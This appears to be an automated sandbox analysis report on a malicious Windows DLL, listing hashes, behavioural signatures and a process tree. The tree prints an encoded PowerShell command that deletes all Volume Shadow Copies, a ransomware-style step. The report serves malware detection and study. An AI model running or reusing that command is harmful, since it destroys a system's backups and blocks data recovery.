Analysis
-
max time kernel
111s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
23-05-2022 23:48
Static task
static1
Behavioral task
behavioral1
Sample
d8cca1666aa4989857dd44bfa0ec14571527be9a3a72dae519ff67a2b8f4de2e.dll
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
d8cca1666aa4989857dd44bfa0ec14571527be9a3a72dae519ff67a2b8f4de2e.dll
Resource
win10v2004-20220414-en
General
-
Target
d8cca1666aa4989857dd44bfa0ec14571527be9a3a72dae519ff67a2b8f4de2e.dll
-
Size
164KB
-
MD5
4ddc4c10f348e34445cae6ebac80bf87
-
SHA1
54fa2d553b774fa273e254ea8a9484f17a4b8747
-
SHA256
d8cca1666aa4989857dd44bfa0ec14571527be9a3a72dae519ff67a2b8f4de2e
-
SHA512
d91730d1e1bcaa5e58b1a9cebee04d2634d80094ae953e3c329acb5476960bdb79dc0a3bc5b8da2836c3646a90ba91d5126b47b5e83f88dab7b05c7650700c58
Malware Config
Signatures
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
rundll32.exedescription ioc process File opened (read-only) \??\F: rundll32.exe File opened (read-only) \??\J: rundll32.exe File opened (read-only) \??\L: rundll32.exe File opened (read-only) \??\M: rundll32.exe File opened (read-only) \??\Q: rundll32.exe File opened (read-only) \??\U: rundll32.exe File opened (read-only) \??\Z: rundll32.exe File opened (read-only) \??\H: rundll32.exe File opened (read-only) \??\I: rundll32.exe File opened (read-only) \??\N: rundll32.exe File opened (read-only) \??\T: rundll32.exe File opened (read-only) \??\X: rundll32.exe File opened (read-only) \??\Y: rundll32.exe File opened (read-only) \??\E: rundll32.exe File opened (read-only) \??\S: rundll32.exe File opened (read-only) \??\V: rundll32.exe File opened (read-only) \??\W: rundll32.exe File opened (read-only) \??\A: rundll32.exe File opened (read-only) \??\B: rundll32.exe File opened (read-only) \??\G: rundll32.exe File opened (read-only) \??\K: rundll32.exe File opened (read-only) \??\O: rundll32.exe File opened (read-only) \??\P: rundll32.exe File opened (read-only) \??\R: rundll32.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
rundll32.exepowershell.exepid process 2684 rundll32.exe 2684 rundll32.exe 2396 powershell.exe 2396 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
rundll32.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 2684 rundll32.exe Token: SeDebugPrivilege 2396 powershell.exe Token: SeBackupPrivilege 4184 vssvc.exe Token: SeRestorePrivilege 4184 vssvc.exe Token: SeAuditPrivilege 4184 vssvc.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
rundll32.exerundll32.exedescription pid process target process PID 4496 wrote to memory of 2684 4496 rundll32.exe rundll32.exe PID 4496 wrote to memory of 2684 4496 rundll32.exe rundll32.exe PID 4496 wrote to memory of 2684 4496 rundll32.exe rundll32.exe PID 2684 wrote to memory of 2396 2684 rundll32.exe powershell.exe PID 2684 wrote to memory of 2396 2684 rundll32.exe powershell.exe
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\d8cca1666aa4989857dd44bfa0ec14571527be9a3a72dae519ff67a2b8f4de2e.dll,#11⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\d8cca1666aa4989857dd44bfa0ec14571527be9a3a72dae519ff67a2b8f4de2e.dll,#12⤵
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken